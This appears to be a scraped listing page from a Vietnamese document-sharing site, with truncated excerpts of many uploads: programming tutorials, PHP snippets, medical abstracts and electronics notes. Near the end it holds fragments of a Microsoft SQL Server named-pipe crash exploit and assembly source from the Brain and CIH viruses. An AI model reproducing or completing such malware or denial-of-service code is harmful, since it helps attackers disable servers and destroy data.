f6 and study the content of g rx dataframe in the expressions tab by clicking on the in front of it you can see the hex value of the data on the right side of the window when you highlight the data

Design Tradeoffs in Industrial Ethernet Hardware Implementations (1)

Ngày tải lên : 22/06/2015, 14:04

... based on 25MHz clock Renesas TPS-1: Profinet IRT ASIC  Hardware  Single chip solution – Integrated CPU – Integrated PROFINET IRT Switch – Integrated RAM  BGA housing 15 x 15 mm² with mm pitch ... communication required in today’s Smart Factory Equipment OEMs are migrating to Industrial Ethernet technologies, however, selecting the right protocol is only the first consideration.”  Solution: ... How Is Industrial Ethernet Different?  Industrial Ethernet Protocol Architectures  Considerations In Implementing Your Industrial Ethernet Solution  Renesas Solutions for Industrial Ethernet...

44
434
0

Code danh sách liên kết

Ngày tải lên : 17/08/2012, 11:07

1
2K
8

How to code .NET

Ngày tải lên : 21/08/2012, 09:54

... Page 18 CHAPTER ■ TESTING YOUR CODE By inspecting the generated output of the fake output, you can verify the correctness of a contract (by verifying the correctness of the data being sent in the ... types with methods and the parameters necessary to call those methods, then you are missing the point of writing tests When you write a large number of tests without considering the context, you ... locals init ([0] valuetype StructsAndClassesCanBeConfusing.StructEggbox eggs) The command locals init initializes the variable eggs to be a value type and is an automatic variable in the scope of...

231
810
0

Code SQL.doc

Ngày tải lên : 21/08/2012, 16:16

... True Then If TenDonVi "" Then Msg = MsgBox("Ban co dong y sua don vi khong ?", vbQuestion + vbYesNo) If Msg = vbYes Then DE.sp_SuaDonVi MaDonVi, TenDonVi disPlaylistViewDV End If Else MsgBox ... nhan ' - Su li sinh sau nhap lai NgaySinh = SuLiNgaySinh(marNgaySinhBenhNhan.Text, "BenhNhan") If NgaySinh = "NotOK" Then MsgBox " Ngay sinh benh nhan khong hop le", vbCritical Exit Sub End If ... Msg As Integer Dim MaDonVi As String Dim TenDonVi As String MaDonVi = Trim(txtMaDV.Text) TenDonVi = Trim(txtTenDV.Text) Msg = MsgBox("Ban co chac chan xoa khong", vbQuestion + vbYesNo) If Msg...

141
882
2

Viết code trong Visual basic

Ngày tải lên : 22/08/2012, 11:03

... = "" ' content of Textbox txtName is nothing, i.e an empty string NOT IsNumeric(txtAge.text) ' content of TextBox txtAge is not a number Trong Logical Expression thứ nhì ta dùng Function IsNumeric ... person" ElseIf (TheColorYouLike = vbBlue) Then MsgBox "You 're a brave person" ElseIf (TheColorYouLike = vbMagenta) Then MsgBox "You 're a sad person" Else MsgBox "You 're an average person" ... String to null string For i = To Len(txtOriginalString.Text) ' Iterate from the first chracter to the last character of the string ' Check if chracter is NOT a blank space If Mid(txtOriginalString.Text,...

10
3.3K
50

MSC - Mobile Secret Code

Ngày tải lên : 23/08/2012, 09:24

... Sony Erricson Chươ ương Trong chương kí hiệu > nghĩa nút sang phải hay g t Joypad sang phải,< có ý nghĩa tương tự Bạn nhấn > * < < * < *.Một menu bí mật mở ra,bạn thấy Model,thông tun phiên ... tiếng Trung Quốc,Thái Lan hay Ả Rập mà không tài đổi lại thành tiếng Anh có cách.Giữ phím mũi tên trái (hay g t giữ Joypad sang trái) nhấn 0000 tương tự cho bên phải Điện thoại đổi ngôn ngữ mặc ... Chức ghi âm: #*22671# bắt đầu ghi âm AMR #*22673# tạm dừng #*22674# tiếp tục #*22675# phát lại #*22676# dừng Kết thúc thú Kiến thức vô hạn người hiểu biết có giới hạn.Tác giả mong nhận đóng g p...

6
502
0

Source code Server.doc

Ngày tải lên : 25/08/2012, 10:24

... makeable = True 'Khoi tao duong truyen co dinh toi server Set oracleconn = New ADODB.Connection Set sqlconn = New ADODB.Connection 'Lay thong tin khoi dong re: Set sysdb = OpenDatabase(App.Path & "\sysserver.mdb") ... Set connectre = sysdb.OpenRecordset("connect") Set settingre = sysdb.OpenRecordset("setting") If connectre.RecordCount > And settingre.RecordCount > Then autoconn = settingre.Fields("AutoConnect") .value ... ElseIf settingre.RecordCount = Then 'Set default values settingre.AddNew settingre.Fields("TestTime") = 20000 settingre.Fields("QueryTimeout") = 5000 settingre.Fields("AutoConnect") = settingre.Update...

6
1K
2

Viết code trong VB6

Ngày tải lên : 28/08/2012, 15:46

... = "" ' content of Textbox txtName is nothing, i.e an empty string NOT IsNumeric(txtAge.text) ' content of TextBox txtAge is not a number Trong Logical Expression thứ nhì ta dùng Function IsNumeric ... person" ElseIf (TheColorYouLike = vbBlue) Then MsgBox "You 're a brave person" ElseIf (TheColorYouLike = vbMagenta) Then MsgBox "You 're a sad person" Else MsgBox "You 're an average person" ... String to null string For i = To Len(txtOriginalString.Text) ' Iterate from the first chracter to the last character of the string ' Check if chracter is NOT a blank space If Mid(txtOriginalString.Text,...

10
1.8K
13

Viết code trong Visual Basic 6

Ngày tải lên : 28/08/2012, 15:46

... = "" ' content of Textbox txtName is nothing, i.e an empty string NOT IsNumeric(txtAge.text) ' content of TextBox txtAge is not a number Trong Logical Expression thứ nhì ta dùng Function IsNumeric ... person" ElseIf (TheColorYouLike = vbBlue) Then MsgBox "You 're a brave person" ElseIf (TheColorYouLike = vbMagenta) Then MsgBox "You 're a sad person" Else MsgBox "You 're an average person" ... String to null string For i = To Len(txtOriginalString.Text) ' Iterate from the first chracter to the last character of the string ' Check if chracter is NOT a blank space If Mid(txtOriginalString.Text,...

10
3.6K
49

Code php random Image

Ngày tải lên : 11/09/2012, 13:53

1
786
1

Code đếm số người đang online

Ngày tải lên : 11/09/2012, 15:49

... password hợp lệ - Không cho đăng nhập tự động hay đăng nhập nhiều lần liên tiếp Giải pháp: Dùng HTTP Authentication Dùng Form đăng nhập tự tạo PHP: Dùng HTTP Authentication $user="guest"; $password="password"; ... fgets($fp, 4096); $count += 1; fseek($fp,0); fputs($fp, $count); flock($fp, 3); 10 fclose($fp); 11 } else { 12 echo "Can' t find file, check $COUNT_FILE "; 13 } Đăng nhập: Ý tưởng: - Người dùng ... $password="password"; function authenticate() { header('WWW-Authenticate: Basic realm="Đăng nhập"'); header('HTTP/1.0 401 Unauthorized'); echo "Vui lòng nhập tên mật hợp lệ"; exit; } if (!isset($_SERVER['PHP_AUTH_USER'])...

2
1.5K
13

code FCFS Header file for Cpu scheduling

Ngày tải lên : 12/09/2012, 16:40

... Enter the Time Quantum="; cin>>tq; //TO find the dimension of the Rrobin array m=max/tq+1; //initializing Rrobin array for(i=1;i

24
933
3

Mạch điện tử - chương 7 - OP-AMP-Khuếch đại và ứng dụng

Ngày tải lên : 10/10/2012, 15:51

... (khoảng 3pF) song song với Rf để giảm nhiễu tần số cao Trương Văn Tám VII-38 Mạch Điện Tử Chương 7: OP-AMP_Khuếch đại ứng dụng - Khơng mắc thêm tụ song song với Ri từ ngõ vào (-) xuống mass làm giảm ... nhiều dạng mạch lọc dải triệt, thơng dụng mắc mạch hạ thơng thượng thơng song song với dùng mạch hình 7.58 Trương Văn Tám VII-30 Mạch Điện Tử Chương 7: OP-AMP_Khuếch đại ứng dụng 7.4 TRẠNG THÁI ... +1 Người ta thường chọn Rf=R để giảm dòng offset Trương Văn Tám VII-20 Mạch Điện Tử Chương 7: OP-AMP_Khuếch đại ứng dụng * Mạch lọc hạ thơng -40dB/dec: Trong nhiều ứng dụng, ta cần phải giảm...

43
6.9K
13

Hướng dẫn viết code cho LED ma trận 8x8 bằng thanh ghi dịch 74HC595

Ngày tải lên : 15/10/2012, 10:02

... C2=PORTC.2 #bit D5=PORTD.5 #bit D6=PORTD.6 #bit D7=PORTD.7 #define SCKR C0 #define LatR C1 #define DataR C2 #define SCKC D7 #define LatC D6 #define DataC D5 int8 i=0; int8 chu1,chu2; int8 BangChu[16]={0xCF,0x87,0x33,0x33,0x03,0x03,0x33,0x33, ... mã chữ: Dùng Exel tạo bảng: Hoàng Sỹ Tân – Điện tử – K53 Giả sử tạo chữ A, số LED sáng: Thêm ô lại số vào, chuyển sang mã Hexa theo hàng: Hoàng Sỹ Tân – Điện tử – K53 Tương ứng: Hàng 1: 1100 1111 ... data1 (BangChu2[chu2+0]);DataR=1;sckr1();LatR1();delay_ms(2); data1 (0xFFFF) ;data1 (0xFFFF); data1 (BangChu2[chu2+1]);DataR=0;sckr1();LatR1();delay_ms(2); data1 (0xFFFF) ;data1 (0xFFFF); data1 (BangChu2[chu2+2]);DataR=0;sckr1();LatR1();delay_ms(2); data1 (0xFFFF) ;data1 (0xFFFF);...

18
10.4K
86

Báo cáo y học: "Emulsified Isoflurane Preconditioning Reduces Lung Injury Induced By Hepatic Ischemia/Reperfusion in Rats"

Ngày tải lên : 25/10/2012, 11:00

... thickening of the alveolar wall were seen in emulsified isoflurane preconditioning group (Grade 2, Fig 1D), suggesting that lung injury induced by hepatic I/R was attenuated by emulsified isoflurane ... preconditioning had a similar effect on NF-B translocation in the lung Emulsified isoflurane preconditioning suppressed the activity of NF-B significantly and reduced the expression of inflammatory ... animals4,5, and later confirmed by several studies in the brain6, kidney7 and liver8 Inhaled isoflurane preconditioning was also shown to reduce acute lung injury and inflammation induced by endotoxin9,10...

9
389
0

Báo cáo y học: "Intrathecal siRNA against Toll-like receptor 4 reduces nociception in a rat model of neuropathic pain"

Ngày tải lên : 25/10/2012, 11:48

... verified by RT-PCR using primers 5'-CGGGAGCTCTGAA TGCTCTCTTGCATCTGGCTGGC-3’ and 5'-CGGGT CGACGCGATACAATTCGACCTGCTG-3’ 252 To construct a green fluorescent protein (GFP) tagged TLR4 expressing vector, ... synthesized by United Gene Company (Shanghai, China) The primers amplifying the full length cDNA of rat TLR4 were 5'-CGGGAGCTCTGAATGCTCTCTTGCATC TGGCTGGC-3’ (forward) and 5'-CGGGTCGACGCG ATACAATTCGACCTGCTG-3’ ... inserted to construct the reporter vector, pEGFPC1-TLR4 The reporter vector was verified by RT-PCR using primers 5'-CGGGAGCTCTGAA TGCTCTCTTGCATCTGGCTGGC-3’ and 5'-CGGGT CGACGCGATACAATTCGACCTGCTG-3’ To...

9
487
0

Báo cáo y học: "Parvovirus B19 Genotype Specific Amino Acid Substitution in NS1 Reduces the Protein’s Cytotoxicity in Culture"

Ngày tải lên : 26/10/2012, 09:32

... NS1 and Substitution Construct Cloning Construct Primer External Primers F- 5’ GGCGACGAATTCATGGAGCTATTTAG GG R- 5’ GGCCATCTAGATTACTCATAATCTACAAAGCT PathT PRMTTA 1- 5’ AGTATCATTTATGGCTACGGTAATG ... polar one also suggests a disruption in the potential orientation of the side chain and hence a change in the secondary structure of that region in the protein Since the I181M substitution did ... results in high conservation of their sequence identity, especially within the well-characterized catalytic regions, such as the endonuclease and NTP-binding motifs The highly integrated functions of...

10
554
0

Code làm tê liệt các máy chủ dùng MSSQL Server

Ngày tải lên : 02/11/2012, 14:18

... '\x00'; printf("Connecting Server \n"); hPipe = CreateFile(lpPipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (INVALID_HANDLE _VALUE == hPipe) { printf("Error!Connect ... printf("\n\tError!WriteFile.%d\n\n", GetLastError()); printf( "When see the error message, the target may be crashed!!\n\n"); goto Exit0; } Exit0: return 0; } fix lỗi download patch : 1/Microsoft SQL Server 7.0 2.Microsoft SQL ... (!bResult) { printf("Error!SetNamedPipeHandleState.%d\n", GetLastError()); goto Exit0; } bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL); if (!bResult) { printf("\n\tError!WriteFile.%d\n\n",...

3
550
5

Code virus brain.

Ngày tải lên : 02/11/2012, 14:18

... ds:[7C00h+offset curhead],al cmp al,2 jne donecalc mov byte ptr ds:[7C00h+offset curhead],0 inc byte ptr ds:[7C00h+offset cursector+1] donecalc: retn ; the following is a collection of garbage bytes ... low bits call clus2offset12bit mov ax,[bx+si] ; get FAT entry and ax,0F000h ; mark it bad or ax,0FF7h jmp short putitback ; and put it back nop low_12: call clus2offset12bit mov ax,[bx+si] ; get ... changeroot: call readroot ; read in root directory jc donotchangeroot push di call changevolume ; change volume label pop di jc donotchangeroot call writeroot ; write back new root dir donotchangeroot:...

13
570
3

Code virus CIH

Ngày tải lên : 02/11/2012, 14:18

... Size of Following Section Table ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table mov eax, (AddressOfEntryPoint-@9)[esi] add eax, (ImageBase-@9)[esi] ... jz QuitLoopOfMergeAllVirusCodeSection ; ZF = jmp LoopOfMergeAllVirusCodeSection QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again ... * The Code Size of Merge * ; ; ; ; ; ; ; * Virus Code Section and * * Total Size of Virus * * Code Section Table Must * * be Small or Equal the * * Unused Space Size of * * Following Section Table...

21
2.4K
12